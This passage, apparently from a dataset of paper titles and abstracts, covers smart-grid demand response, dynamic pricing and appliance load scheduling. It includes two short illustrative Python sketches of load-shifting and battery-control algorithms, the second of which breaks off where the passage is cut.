The two types are modeled separately and a new optimal bidding function is developed and tested based on this model. --- paper_title: A Direct Load Control Model for Virtual Power Plant Management paper_content: In the framework of liberalized electricity markets, distributed generation and controllable demand have the opportunity to participate in the real-time operation of transmission and distribution networks. This may be done by using the virtual power plant (VPP) concept, which consists of aggregating the capacity of many distributed energy resources (DER) in order to make them more accessible and manageable across energy markets. This paper provides an optimization algorithm to manage a VPP composed of a large number of customers with thermostatically controlled appliances. The algorithm, based on a direct load control (DLC), determines the optimal control schedules that an aggregator should apply to the controllable devices of the VPP in order to optimize load reduction over a specified control period. The results define the load reduction bid that the aggregator can present in the electricity market, thus helping to minimize network congestion and deviations between generation and demand. The proposed model, which is valid for both transmission and distribution networks, is tested on a real power system to demonstrate its applicability. --- paper_title: Residential implementation of critical-peak pricing of electricity paper_content: This paper investigates how critical-peak pricing (CPP)affects households with different usage and income levels, with the goalof informing policy makers who are considering the implementation of CPPtariffs in the residential sector. Using a subset of data from theCalifornia Statewide Pricing Pilot of 2003-2004, average load changeduring summer events, annual percent bill change, and post-experimentsatisfaction ratings are calculated across six customer segments,categorized by historical usage and income levels. Findings show thathigh-use customers respond significantly more in kW reduction than dolow-use customers, while low-use customers save significantly more inpercentage reduction of annual electricity bills than do high-usecustomers results that challenge the strategy of targeting only high-usecustomers for CPP tariffs. Across income levels, average load and billchanges were statistically indistinguishable, as were satisfaction ratesresults that are compatible with a strategy of full-scale implementationof CPP rates in the residential sector. Finally, the high-use customersearning less than $50,000 annually were the most likely of the groups tosee bill increases about 5 percent saw bill increases of 10 percent ormore suggesting that any residential CPP implementation might considertargeting this customer group for increased energy efficiencyefforts. --- paper_title: Demand participation in the restructured Electric Reliability Council of Texas market paper_content: Does an electricity market which has been restructured to foster competition provide greater opportunities for demand response than a traditional regulated utility industry? The experiences of the restructured Electric Reliability Council of Texas (ERCOT) market over the past eight years provide some hope that it is possible to design a competitive market which will properly value and accommodate demand response. 
While the overall level of demand response in ERCOT is below the levels enjoyed prior to restructuring, there have nonetheless been some promising advances, including the integration of demand-side resources into competitive markets for ancillary services. ERCOT's experiences demonstrate that the degree of demand participation in a restructured market is highly sensitive to the market design. But even in a market which has been deregulated to a large degree, regulatory intervention and special demand-side programs may be needed in order to bolster demand response. --- paper_title: Present status and future trends in enabling demand response programs paper_content: This paper addresses implementation of Demand Response (DR) programs in competitive electricity markets. An overview of present status of the application of DR programs in major electricity markets is provided. In this paper, An objective-wised classification of DR measures is proposed which is rooted in practical DR experiences. Market opportunities and associated barriers are investigated. Further, enabling technologies for implementing DR programs are discussed. Finally, the role of smart grid in enabling DR is highlighted. --- paper_title: A summary of demand response in electricity markets paper_content: Abstract This paper presents a summary of Demand Response (DR) in deregulated electricity markets. The definition and the classification of DR as well as potential benefits and associated cost components are presented. In addition, the most common indices used for DR measurement and evaluation are highlighted, and some utilities’ experiences with different demand response programs are discussed. Finally, the effect of demand response in electricity prices is highlighted using a simulated case study. --- paper_title: Direct Load Control (DLC) Considering Nodal Interrupted Energy Assessment Rate (NIEAR) in Restructured Power Systems paper_content: A direct load control (DLC) scheme of air conditioning loads (ACL) considering direct monetary compensation to ACL customers for the service interruption caused by the DLC program is proposed in this paper for restructured power systems. The nodal interrupted energy assessment rate (NIEAR), which is used as the bids from the ACL customers, is utilized to determine the direct monetary compensation to the ACL customers. The proposed scheme was investigated for the PoolCo electricity market. The optimal DLC scheme is determined based on the minimum system operating cost which is comprised of the system energy cost, the system spinning reserve cost and the compensation cost to the ACL customers. Dynamic programming (DP) was used to obtain the optimal DLC scheme. The IEEE reliability test system (RTS) was studied to illustrate the proposed DLC scheme. --- paper_title: Demand response in smart electricity grids equipped with renewable energy sources: A review paper_content: Dealing with Renewable Energy Resources (RERs) requires sophisticated planning and operation scheduling along with state of art technologies. Among many possible ways for handling RERs, Demand Response (DR) is investigated in the current review. Because of every other year modifications in DR definition and classification announced by Federal Energy Regulatory Commission (FERC), the latest DR definition and classification are scrutinized in the present work. Moreover, a complete benefit and cost assessment of DR is added in the paper. 
Measurement and evolution methods along with the effects of DR in electricity prices are discussed. Next comes DR literature review of the recent papers majorly published after 2008. Eventually, successful DR implementations, around the world, are analyzed. --- paper_title: Smart (in-home) power scheduling for demand response on the smart grid paper_content: This paper proposes a power scheduling-based communication protocol for in-home appliances connected over home area network and receiving real-time electricity prices via a smart meter. Specifically, a joint media access and appliance scheduling approach is developed to allow appliances to coordinate power usage so that total demand for the home is kept below a target value. Two types of appliances are considered: 1) “real-time” which consume power as they desire; and 2) “schedulable” which can be turned on at a later time. Simulation results indicate that for an appropriate target total power consumption, our scheme leads to a reduced peak demand for the home and produces a demand that is more level over time. --- paper_title: Stochastic Control for Smart Grid Users With Flexible Demand paper_content: In this paper, we study the optimal control problem for the demand-side of the smart grid under time-varying prices with general structures. We assume that users are equipped with smart appliances that allow delay in satisfying demands, and one central controller that makes energy usage decisions on when and how to satisfy the scheduled demands. We formulate a dynamic programming model for the control problem. The model deals with stochastic demand arrivals and schedules the demands based on their own allowable delays, which are specified by users. However, the dynamic programming model encounters the “curses of dimensionality” and some other difficulties, thus is hard to solve. We develop a decentralization-based heuristic first, and also propose an approximation approach based on Q-learning. Finally, we conduct numerical studies on a testing problem. The simulation results show that both the Q-learning and the decentralization based heuristic approaches work well, but they have their own advantages and disadvantages under different scenarios. Lastly, we conclude the paper with some discussions on future extension directions. --- paper_title: Coupon Incentive-Based Demand Response: Theory and Case Study paper_content: This paper presents the formulation and critical assessment of a novel type of demand response (DR) program targeting retail customers (such as small/medium size commercial, industrial, and residential customers) who are equipped with smart meters yet still face a flat rate. Enabled by pervasive mobile communication capabilities and smart grid technologies, load serving entities (LSEs) could offer retail customers coupon incentives via near-real-time information networks to induce demand response for a future period of time in anticipation of intermittent generation ramping and/or price spikes. This scheme is referred to as coupon incentive-based demand response (CIDR). In contrast to the real-time pricing or peak load pricing DR programs, CIDR continues to offer a flat rate to retail customers and also provides them with voluntary incentives to induce demand response. Theoretical analysis shows the benefits of the proposed scheme in terms of social welfare, consumer surplus, LSE profit, the robustness of the retail electricity rate, and readiness for implementation. 
The pros and cons are discussed in comparison with existing DR programs. Numerical illustration is performed based on realistic supply and demand data obtained from the Electric Reliability Council of Texas (ERCOT). --- paper_title: Demand Response Architecture: Integration into the Distribution Management System paper_content: Demand Response (DR) refers to actions taken by the utility to respond to a shortage of supply for a short duration of time in the future. DR is one of the enablers of the Smart Grid paradigm as it promotes interaction and responsiveness of the customers and changes the grid from a vertically integrated structure to one that is affected by the behavior of the demand side. In Principle, it is possible to perform DR at the substation level for the customers connected to the feeders downstream or at the demand response service provider (aggregator) for the customers under its territory. This would allow for an area based solution driven mostly by the financial aspects as well as terms and conditions of the mutual agreements between the individual customers and the utility. However, as the penetration of DR increases, incorporating the network model into the DR analysis algorithm becomes necessary. This ensures the proper performance of the DR process and achieves peripheral objectives in addition to achieving the target demand reduction. The added value to the DR algorithm by incorporating the model of the distribution network can only be realized if the engine is developed as an integrated function of the Distribution Management System (DMS) at the network control center level. This paper focuses on the demand response architecture implemented at the DMS level and discusses some practical considerations associated with this approach --- paper_title: An introduction to load management paper_content: Abstract Permanent availability of electricity is nowadays taken for granted, but grid reliability and sustainability is an everyday process of supply and demand balancing. In this document we provide a comprehensive study of the load management methods, techniques and programs theoretically described or practically used in developed and developing countries. Not only experience and actual situation, but also evaluation, future goals and challenges are described. --- paper_title: An innovative RTP-based residential power scheduling scheme for smart grids paper_content: This paper proposes a Real-Time Pricing (RTP)-based power scheduling scheme as demand response for residential power usage. In this scheme, the Energy Management Controller (EMC) in each home and the service provider form a Stackelberg game, in which the EMC who schedules appliances' operation plays the follower level game, and the provider who sets the real-time prices according to current power usage profile plays the leader level game. The sequential equilibrium is obtained through the information exchange between them. Simulation results indicate that our scheme can not only save money for consumers, but also reduce peak load and the variance between demand and supply, while avoiding the “rebound” peak problem. --- paper_title: Optimized Day-Ahead Pricing for Smart Grids with Device-Specific Scheduling Flexibility paper_content: Smart grids are capable of two-way communication between individual user devices and the electricity provider, enabling providers to create a control-feedback loop using time-dependent pricing. 
By charging users more in peak and less in off-peak hours, the provider can induce users to shift their consumption to off-peak periods, thus relieving stress on the power grid and the cost incurred from large peak loads. We formulate the electricity provider's cost minimization problem in setting these prices by considering consumers' device-specific scheduling flexibility and the provider's cost structure of purchasing electricity from an electricity generator. Consumers' willingness to shift their device usage is modeled probabilistically, with parameters that can be estimated from real data. We develop an algorithm for computing day-ahead prices, and another algorithm for estimating and refining user reaction to the prices. Together, these two algorithms allow the provider to dynamically adjust the offered prices based on user behavior. Numerical simulations with data from an Ontario electricity provider show that our pricing algorithm can significantly reduce the cost incurred by the provider. --- paper_title: Demand response implementation in a home area network: A conceptual hardware architecture paper_content: Demand response (DR) is an important demand-side resource that allows for lower electricity consumption when the system is under stress. This paper presents a DR framework that can be implemented within a home area network, as well as a conceptual hardware architecture for a Home Management System (HMS) and appliance interface units that enable in-home DR implementation. The proposed DR strategy allows for controlling energy-intensive loads taking into consideration both consumers' comfort and load priority. The HMS acts as the central monitoring and decision-making unit for all energy-intensive loads within a home. The appliance interface unit communicates with the HMS while capturing electric power consumption data and performing local load control. Standby electric power consumption of each element in the network is also discussed. --- paper_title: Piloting the Smart Grid paper_content: To address the likely impact of the smart grid on customers, utilities, and society as a whole, it may be necessary to conduct a pilot. When should a pilot be conducted and how should it be conducted? What validity criteria should the pilot satisfy? Here are issues to consider. --- paper_title: A demand-side response smart grid scheme to mitigate electrical peak demands and access renewable energy sources paper_content: Growing demands are causing increased pressure on the electricity infrastructure and perpetually escalating energy prices. Typically, there are daily and seasonal demand fluctuations oscillating between excessive peak and equally excessive low demands. Peak demands, at times, cause congestion on the transmission and distribution network, associated with compromised quality, risk of outages and high-priced energy supply. Expensive-to-run power plants are usually operated for short periods of time to meet peak demands, which makes their operation even more expensive. Low demands, usually supplied by base-load power stations, can drive the electrical capacity and network to be operated well below sustainable economic feasibility. Spreading out the demand profile at a moderated level would achieve improved utilization of the electrical infrastructure.
This research presents a demand-side response scheme to be implemented at end-users' premises, shifting loads to the right time of the day in order to spread out the demand profile and allow utilization of renewable energy sources. The technology uses programmable internet relays controlling appliance switches to operate loads automatically. The paper presents simulations of the economic model corresponding to the above described scheme, representing an incentive-based demand response. In the simulation, the impact of these programs on load shape and peak load magnitudes, the financial benefit to users, and the reduction of energy consumption are shown. The results demonstrated a more moderate load profile with a lower peak load magnitude and reduced energy cost. --- paper_title: Demand side management—A simulation of household behavior under variable prices paper_content: Within the next few years, consumer households will be increasingly equipped with smart metering and intelligent appliances. These technologies are the basis for households to better monitor electricity consumption and to actively control loads in private homes. Demand side management (DSM) can be adapted to private households. We present a simulation model that generates household load profiles under flat tariffs and simulates changes in these profiles when households are equipped with smart appliances and face time-based electricity prices. --- paper_title: An Event-Driven Demand Response Scheme for Power System Security Enhancement paper_content: Demand response has become a key feature of the future smart grid. In addition to having advanced communication and computing infrastructures, a successful demand response program must respond to the needs of a power system. In other words, the efficiency and security of a power system dictate the locations, amounts and speeds of the load reductions of a demand response program. In this paper, we propose an event-driven emergency demand response scheme to prevent a power system from experiencing voltage collapse. A technique to design such a scheme is presented. This technique is able to provide key setting parameters such as the amount of demand reductions at various locations to arm the demand response infrastructure. The validity of the proposed technique has been verified by using several test power systems. --- paper_title: A Framework for Evaluation of Advanced Direct Load Control With Minimum Disruption paper_content: The advent of advanced sensor technology and the breakthroughs in telecommunication open up several new possibilities for demand-side management. More recently, there has been greater interest from utilities as well as system operators in utilizing load as a system resource through the application of new technologies. With the wider application of demand-side management, there is an increasing emphasis on control of loads with minimum disruption. This paper develops a new framework for designing as well as assessing such an advanced direct load control program with the objective of minimizing end-user discomfort, formulated as an optimization problem. With a fairly general setup for demand-side management, a simulation-based framework is developed for the stochastic optimization problem. Next, using this framework, insights into the effect of different parameters and constraints in the model on load control are developed.
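Several of the load control and load shifting studies above reduce, at their core, to placing deferrable appliance runs into low-load time slots. The sketch below is a deliberately simplified greedy illustration of that idea rather than the algorithm of any cited paper; the base profile, appliance powers, and time windows are invented, and a real direct load control scheme would also model comfort, priority, and rebound effects.

# Simplified greedy load-shifting sketch: place each deferrable job at the
# start slot (within its allowed window) that keeps the aggregate peak lowest.
# Base profile and job list are illustrative only.

def schedule_jobs(base, jobs):
    profile = list(base)
    plan = {}
    for name, power, duration, earliest, latest in jobs:
        best_start, best_peak = earliest, float("inf")
        for start in range(earliest, latest - duration + 2):
            trial = profile[:]
            for t in range(start, start + duration):
                trial[t] += power
            if max(trial) < best_peak:
                best_start, best_peak = start, max(trial)
        for t in range(best_start, best_start + duration):
            profile[t] += power
        plan[name] = best_start
    return plan, profile

# 24 hourly slots (kW) with an evening peak, plus three shiftable appliances
# given as (name, power in kW, duration in slots, earliest slot, latest slot).
base = [1.0]*6 + [2.0]*4 + [1.5]*7 + [4.0]*3 + [2.0]*4
jobs = [("dishwasher", 1.2, 2, 0, 23),
        ("washing_machine", 2.0, 2, 8, 22),
        ("ev_charger", 3.0, 4, 18, 23)]

plan, shaped = schedule_jobs(base, jobs)
print(plan)
print("peak of base profile:", max(base), "peak after scheduling:", max(shaped))

With these numbers the electric-vehicle charge is pushed past the evening peak, so the aggregate peak ends up around 5 kW instead of the roughly 7 kW that charging at the earliest admissible slot would cause.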
--- paper_title: Impact of TOU rates on distribution load shapes in a smart grid with PHEV penetration paper_content: A smart grid introduces new opportunities and challenges to electric power grids especially at the distribution level. Advanced metering infrastructure (AMI) and information portals enable customers to have access to real-time electricity pricing information, thus facilitating customer participation in demand response. The objective of this paper is to analyze the impact of time-of-use (TOU) electricity rates on customer behaviors in a residential community. Research findings indicate that the TOU rate can be properly designed to reduce the peak demand even when PHEVs are present. This result is insensitive to seasons, PHEV penetration levels and PHEV charging strategies. It is expected that this paper can give policy makers, electric utilities and other relevant stakeholders an insight into the impacts of various TOU pricing schemes on distribution load shapes in a smart grid with PHEV penetration. --- paper_title: Demand response model and its effects on voltage profile of a distribution system paper_content: This paper develops a model for Demand Response (DR) by utilizing consumer behavior modeling considering different scenarios and levels of consumer rationality. Consumer behavior modeling has been done by developing extensive demand-price elasticity matrices for different types of consumers. These Price Elasticity Matrices (PEMs) are utilized to calculate the level of demand response for a given consumer. DR thus obtained is applied to a real world distribution network considering a day-ahead real time pricing scenario to study the effects of demand reduction on system voltage. Results show considerable boost in system voltage that paves way for further demand curtailment through demand side management techniques like Volt/Var Control (VVC). --- paper_title: Rethinking Real-Time Electricity Pricing paper_content: Most US consumers are charged a near-constant retail price for electricity, despite substantial hourly variation in the wholesale market price. This paper evaluates the first program to expose residential consumers to hourly real-time pricing (RTP). I find that enrolled households are statistically significantly price elastic and that consumers responded by conserving energy during peak hours, but remarkably did not increase average consumption during off-peak times. The program increased consumer surplus by $10 per household per year. While this is only one to two percent of electricity costs, it illustrates a potential additional benefit from investment in retail Smart Grid applications, including the advanced electricity meters required to observe a household’s hourly consumption. --- paper_title: Advanced Demand Side Management for the Future Smart Grid Using Mechanism Design paper_content: In the future smart grid, both users and power companies can potentially benefit from the economical and environmental advantages of smart pricing methods to more effectively reflect the fluctuations of the wholesale price into the customer side. In addition, smart pricing can be used to seek social benefits and to implement social objectives. To achieve social objectives, the utility company may need to collect various information about users and their energy consumption behavior, which can be challenging. In this paper, we propose an efficient pricing method to tackle this problem. 
We assume that each user is equipped with an energy consumption controller (ECC) as part of its smart meter. All smart meters are connected to not only the power grid but also a communication infrastructure. This allows two-way communication among smart meters and the utility company. We analytically model each user's preferences and energy consumption patterns in form of a utility function. Based on this model, we propose a Vickrey-Clarke-Groves (VCG) mechanism which aims to maximize the social welfare, i.e., the aggregate utility functions of all users minus the total energy cost. Our design requires that each user provides some information about its energy demand. In return, the energy provider will determine each user's electricity bill payment. Finally, we verify some important properties of our proposed VCG mechanism for demand side management such as efficiency, user truthfulness, and nonnegative transfer. Simulation results confirm that the proposed pricing method can benefit both users and utility companies. --- paper_title: The Power of Dynamic Pricing paper_content: Using data from a generic California utility, it can be shown that it is feasible to develop dynamic pricing rates for all customer classes. These rates have the potential to reduce system peak demands from 1 to 9 percent. --- paper_title: QoE-driven power scheduling in smart grid: architecture, strategy, and methodology paper_content: Smart grid is a new emerging technology which is able to intelligently control the power consumption via network. Therefore, the efficiency of the information exchange between the power suppliers (or control centers) and power customers is an important issue for smart grid. Moreover, the performance of the smart grid usually depends on the customer's satisfaction degree which belongs to the field of quality of experience. In this article, we propose a QoE-driven power scheduling in the context of smart grid from the perspectives of architecture, strategy, and methodology. Specifically, it takes into account the QoE requirement when designing the power allocation scheme. For obtaining the QoE requirement, we analyze the fluctuation of the power load and the impact of the transmission delay. In particular, the power allocation is formulated as an optimization problem that maximizes the social welfare of the system. Based on the given QoE model, an efficient power scheduling scheme is proposed by jointly considering the admission control and QoE expectation. Extensive simulation results indicate that the proposed scheme can efficiently allocate the power according to the dynamic QoE requirements in a practical smart grid system. --- paper_title: Cooperative multi-residence demand response scheduling paper_content: This paper is concerned with scheduling of demand response among different residences and a utility company. The utility company has a cost function representing the cost of providing energy to end-users, and this cost can be varying across the scheduling horizon. Each end-user has a “must-run” load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but the consumption can be adjusted across different slots. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. 
The problem amounts to minimizing the total cost electricity plus the total user dissatisfaction (social welfare), subject to the individual load consumption constraints. The problem is convex and can be solved by a distributed subgradient method. The utility company and the end-users exchange Lagrange multipliers—interpreted as pricing signals—and hourly consumption data through the Advanced Metering Infrastructure, in order to converge to the optimal amount of electricity production and the optimal power consumption schedule. --- paper_title: From Packet to Power Switching: Digital Direct Load Scheduling paper_content: At present, the power grid has tight control over its dispatchable generation capacity but a very coarse control on the demand. Energy consumers are shielded from making price-aware decisions, which degrades the efficiency of the market. This state of affairs tends to favor fossil fuel generation over renewable sources. Because of the technological difficulties of storing electric energy, the quest for mechanisms that would make the demand for electricity controllable on a day-to-day basis is gaining prominence. The goal of this paper is to provide one such mechanisms, which we call Digital Direct Load Scheduling (DDLS). DDLS is a direct load control mechanism in which we unbundle individual requests for energy and digitize them so that they can be automatically scheduled in a cellular architecture. Specifically, rather than storing energy or interrupting the job of appliances, we choose to hold requests for energy in queues and optimize the service time of individual appliances belonging to a broad class which we refer to as "deferrable loads". The function of each neighborhood scheduler is to optimize the time at which these appliances start to function. This process is intended to shape the aggregate load profile of the neighborhood so as to optimize an objective function which incorporates the spot price of energy, and also allows distributed energy resources to supply part of the generation dynamically. --- paper_title: Optimal Control Policies for Power Demand Scheduling in the Smart Grid paper_content: We study the problem of minimizing the long-term average power grid operational cost through power demand scheduling. A controller at the operator side receives consumer power demand requests with different power requirements, durations and time flexibilities for their satisfaction. Flexibility is modeled as a deadline by which a demand is to be activated. The cost is a convex function of total power consumption, which reflects the fact that each additional unit of power needed to serve demands is more expensive to provision, as demand load increases. We develop a stochastic model and introduce two online demand scheduling policies. In the first one, the Threshold Postponement (TP), the controller serves a new demand request immediately or postpones it to the end of its deadline, depending on current power consumption. In the second one, the Controlled Release (CR), a new request is activated immediately if power consumption is lower than a threshold, else it is queued. Queued demands are activated when deadlines expire or when consumption drops below the threshold. These policies admit an optimal control with switching curve threshold structure, which involves active and postponed demand. The CR policy is asymptotically optimal as deadlines increase, namely it achieves a lower bound on average cost, and the threshold depends only on active demand. 
Numerical results validate the benefit of our policies compared to the default one of serving demands upon arrival. --- paper_title: A Water-Filling Based Scheduling Algorithm for the Smart Grid paper_content: The processing and communication capabilities of the smart grid provide a solid foundation for enhancing its efficiency and reliability. These capabilities allow utility companies to adjust their offerings in a way that encourages consumers to reduce their peak hour consumption, resulting in a more efficient system. In this paper, we propose a method for scheduling a community's power consumption such that it becomes almost flat. Our methodology utilizes distributed schedulers that allocate time slots to soft loads probabilistically based on precalculated and predistributed demand forecast information. This approach requires no communication or coordination between scheduling nodes. Furthermore, the computation performed at each scheduling node is minimal. Obtaining a relatively constant consumption makes it possible to have a relatively constant billing rate and eliminates operational inefficiencies. We also analyze the fairness of our proposed approach, the effect of the possible errors in the demand forecast, and the participation incentives for consumers. --- paper_title: Power consumption scheduling for peak load reduction in smart grid homes paper_content: This paper presents a design and evaluates the performance of a power consumption scheduler in smart grid homes, aiming at reducing the peak load in individual homes as well as in the system-wide power transmission network. Following the task model consisting of actuation time, operation length, deadline, and a consumption profile, the scheduler copies or maps the profile according to the task type, which can be either preemptive or nonpreemptive. The proposed scheme expands the search space recursively to traverse all the feasible allocations for a task set. A pilot implementation of this scheduling method reduces the peak load by up to 23.1% for the given task set. The execution time greatly depends on the search space of a preemptive task, as its time complexity is estimated to be O(M^Nnp · (M^(M/2))^Np), where M, Nnp, and Np are the number of time slots, preemptive tasks, and nonpreemptive tasks, respectively. However, it can not only be reduced to almost 2% but also made stable with a basic constraint processing mechanism which prunes a search branch when the partial peak value already exceeds the current best. --- paper_title: Residential task scheduling under dynamic pricing using the multiple knapsack method paper_content: A key component of the smart grid is the ability to enable dynamic residential pricing to incentivize the customer and the overall community to utilize energy more uniformly. However, the complications involved require that automated strategies be provided to the customer to achieve this goal. This paper presents a solution to the problem of optimally scheduling a set of residential appliances under day-ahead variable peak pricing in order to minimize the customer's energy bill (and also, simultaneously spread out energy usage). We map the problem to a well known problem in computer science - the multiple knapsack problem - which enables cheap and efficient solutions to the scheduling problem. Results show that this method is effective in meeting its goals. --- paper_title: Optimal and autonomous incentive-based energy consumption scheduling algorithm for smart grid paper_content: In this paper, we consider deployment of energy consumption scheduling (ECS) devices in smart meters for autonomous demand side management within a neighborhood, where several buildings share an energy source. The ECS devices are assumed to be built inside smart meters and to be connected to not only the power grid, but also to a local area network which is essential for handling two-way communications in a smart grid infrastructure. They interact automatically by running a distributed algorithm to find the optimal energy consumption schedule for each subscriber, with the aim of reducing the total energy cost as well as the peak-to-average-ratio (PAR) in load demand in the system. Incentives are also provided for the subscribers to actually use the ECS devices via a novel pricing model, derived from a game-theoretic analysis. Simulation results confirm that our proposed distributed algorithm significantly reduces the PAR and the total cost in the system. --- paper_title: Demand-side load scheduling incentivized by dynamic energy prices paper_content: Demand response is an important part of the smart grid technologies. This is a particularly interesting problem with the availability of dynamic energy pricing models. Electricity consumers are encouraged to consume electricity more prudently in order to minimize their electric bill, which is in turn calculated based on dynamic energy prices. In this paper, task scheduling policies are presented that help consumers minimize their electrical energy cost by setting the time of use (TOU) of energy in the facility. Moreover, the utility companies can reasonably expect that their customers reduce their consumption at critical times in response to higher energy prices during those times.
These policies target two different scenarios: (i) scheduling with a TOU-dependent energy pricing function subject to a constraint on total power consumption; and (ii) scheduling with a TOU and total power consumption-dependent pricing function for electricity consumption. Exact solutions (based on Branch and Bound) are presented for these task scheduling problems. In addition, a rank-based heuristic and a force-directed heuristic are presented to efficiently solve the aforesaid problems. The proposed heuristic solutions are demonstrated to have very high quality and competitive performance compared to the exact solutions. Moreover, the ability to shape demand utilizing the aforementioned pricing schemes is demonstrated by the simulation results. --- paper_title: Distributed Demand and Response Algorithm for Optimizing Social-Welfare in Smart Grid paper_content: This paper presents a distributed Demand and Response algorithm for smart grid with the objective of optimizing social-welfare. Assuming the power demand range is known or predictable ahead of time, our proposed distributed algorithm will calculate demand and response of all participating energy demanders and suppliers, as well as energy flow routes, in a fully distributed fashion, such that the social-welfare is optimized. During the computation, each node (e.g., demander or supplier) only needs to exchange limited rounds of messages with its neighboring nodes. It provides a potential scheme for energy trade among participants in the smart grids. Our theoretical analysis proves that the algorithm converges even if there is some random noise induced in the process of our distributed Lagrange-Newton based solution. The simulation also shows that the result is close to that of the centralized solution. --- paper_title: Convex Analysis and Nonlinear Optimization, Theory and Examples paper_content: Background * Inequality constraints * Fenchel duality * Convex analysis * Special cases * Nonsmooth optimization * The Karush-Kuhn-Tucker Theorem * Fixed points * Postscript: infinite versus finite dimensions * List of results and notation. --- paper_title: Demand Response Management via Real-Time Electricity Price Control in Smart Grids paper_content: This paper proposes a real-time pricing scheme that reduces the peak-to-average load ratio through demand response management in smart grid systems. The proposed scheme solves a two-stage optimization problem.
On one hand, each user reacts to prices announced by the retailer and maximizes its payoff, which is the difference between its quality-of-usage and the payment to the retailer. On the other hand, the retailer designs the real-time prices in response to the forecasted user reactions to maximize its profit. In particular, each user computes its optimal energy consumption either in closed forms or through an efficient iterative algorithm as a function of the prices. At the retailer side, we develop a Simulated-Annealing-based Price Control (SAPC) algorithm to solve the non-convex price optimization problem. In terms of practical implementation, the users and the retailer interact with each other via a limited number of message exchanges to find the optimal prices. By doing so, the retailer can overcome the uncertainty of users' responses, and users can determine their energy usage based on the actual prices to be used. Our simulation results show that the proposed real-time pricing scheme can effectively shave the energy usage peaks, reduce the retailer's cost, and improve the payoffs of the users. --- paper_title: Intelligent control of vehicle to grid power paper_content: Abstract Vehicle-to-grid (V2G) describes a system in which plug-in electric vehicles (PEV), which includes all electric vehicles and plug-in hybrid electric vehicles, utilize power by plugging into an electric power source and stored in rechargeable battery packs. PEVs significantly increase the load on the grid, much more than you would see in a typical household. The objective of this paper is to demonstrate the use of intelligent solutions for monitoring and controlling the electrical grid when connected to and recharging PEV batteries. In order to achieve this aim, the study examines the distribution of electricity in the power grid of a large-scale city so that PEVs can tap into the system using smart grid electricity. The electricity grid for the large-scale city is modelled, and it can be shown that the vehicle electrification can play a major role in helping to stabilize voltage and load. This developed grid model includes 33 buses, 10 generators, 3 reactors, 6 capacitors, and 33 consumer centers. In addition, the grid model proposes 10 parking servicing 150,000 vehicles per day. The smart grid model uses intelligent controllers. Two intelligent controllers including (i) fuzzy load controllers and (ii) fuzzy voltage controllers have been used in this study to optimize the grid stability of load and voltage. The results show that the smart grid model can respond to any load disturbance in less time, with increased efficiency and improved reliability compared to the traditional grid. In conclusion it is emphasized that smart grid electricity should contribute to PEVs accessing renewable energy. Although the V2G will play a major role in the future portfolio of vehicle technologies, but does not make much sense if the carbon content of the electricity generated by the grid will not be reduced. Thus, the recourse to renewable energy and other alternatives is crucial. The energy is stored in electrochemical power sources (such as battery, fuel cells, supercapacitors, photoelectrochemical) when generated and then delivered to the grid during peak demand times. --- paper_title: Domestic energy management methodology for optimizing efficiency in Smart Grids paper_content: Increasing energy prices and the greenhouse effect lead to more awareness of energy efficiency of electricity supply. 
During the last years, many domestic technologies have been developed to improve this efficiency. These technologies on their own already improve the efficiency, but more can be gained through combined management. Multiple optimization objectives can be used to improve the efficiency, from peak shaving and Virtual Power Plant (VPP) operation to adapting to the fluctuating generation of wind turbines. In this paper a generic management methodology is proposed that is applicable to most domestic technologies, scenarios and optimization objectives. Both local-scale optimization objectives (a single house) and global-scale optimization objectives (multiple houses) can be used. Simulations of different scenarios show that both local and global objectives can be reached. --- paper_title: Modeling the prospects of plug-in hybrid electric vehicles to reduce CO2 emissions paper_content: This study models the CO2 emissions from electric (EV) and plug-in hybrid electric vehicles (PHEV), and compares the results to published values for the CO2 emissions from conventional vehicles based on internal combustion engines (ICE). PHEVs require fewer batteries than EVs, which can make them lighter and more efficient than EVs. PHEVs can also operate their onboard ICEs more efficiently than can conventional vehicles. From this, it was theorized that PHEVs may be able to emit less CO2 than both conventional vehicles and EVs given certain power generation mixes of varying CO2 intensities. Amongst the results it was shown that with a highly CO2 intensive power generation mix, such as in China, PHEVs had the potential to be responsible for fewer tank-to-wheel CO2 emissions over their entire range than both a similar electric and conventional vehicle. The results also showed that unless highly CO2 intensive countries pursue a major decarbonization of their power generation, they will not be able to fully take advantage of the ability of EVs and PHEVs to reduce the CO2 emissions from automotive transport. --- paper_title: Optimal Power Management of Residential Customers in the Smart Grid paper_content: Recently, intensive efforts have been made on the transformation of the world's largest physical system, the power grid, into a "smart grid" by incorporating extensive information and communication infrastructures. Key features in such a "smart grid" include high penetration of renewable and distributed energy sources, large-scale energy storage, market-based online electricity pricing, and widespread demand response programs. From the perspective of residential customers, we can investigate how to minimize the expected electricity cost with real-time electricity pricing, which is the focus of this paper. By jointly considering energy storage, local distributed generation such as photovoltaic (PV) modules or small wind turbines, and inelastic or elastic energy demands, we mathematically formulate this problem as a stochastic optimization problem and approximately solve it by using the Lyapunov optimization approach. From the theoretical analysis, we have also found a good tradeoff between cost saving and storage capacity. A salient feature of our proposed approach is that it can operate without any future knowledge of the related stochastic models (e.g., the distribution) and is easy to implement in real time. We have also evaluated our proposed solution with practical data sets and validated its effectiveness.
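The Lyapunov-optimization entry just above makes its storage decisions online, without forecasts. As a rough, self-contained illustration of that style of controller (not the paper's actual algorithm), the following Python sketch applies a drift-plus-penalty rule to a toy battery; the prices, demands and battery parameters are invented for the example.

```python
import random

# Toy drift-plus-penalty battery controller (illustrative only; the paper's
# model, constraints and performance guarantees are richer than this sketch).
B_MAX = 10.0   # battery capacity (kWh), assumed value
U_MAX = 2.0    # max charge/discharge per slot (kWh), assumed value
THETA = 5.0    # target state of charge used as the Lyapunov "queue" center
V = 4.0        # cost-vs-storage trade-off weight (larger V chases low prices harder)

def drift_plus_penalty_step(soc, price, demand):
    """Pick the charge (+) / discharge (-) amount u for one slot.

    The per-slot objective V*price*(demand + u) + (soc - THETA)*u is linear
    in u, so the minimizer sits at one end of the feasible interval."""
    u_lo = max(-U_MAX, -soc, -demand)   # cannot over-discharge or export
    u_hi = min(U_MAX, B_MAX - soc)      # cannot overfill the battery
    slope = V * price + (soc - THETA)
    return u_lo if slope > 0 else u_hi

random.seed(0)
soc, cost_with_batt, cost_no_batt = 5.0, 0.0, 0.0
for t in range(24 * 7):                    # one simulated week, hourly slots
    price = random.uniform(0.05, 0.40)     # $/kWh, i.i.d. for simplicity
    demand = random.uniform(0.5, 2.0)      # household demand (kWh)
    u = drift_plus_penalty_step(soc, price, demand)
    soc += u
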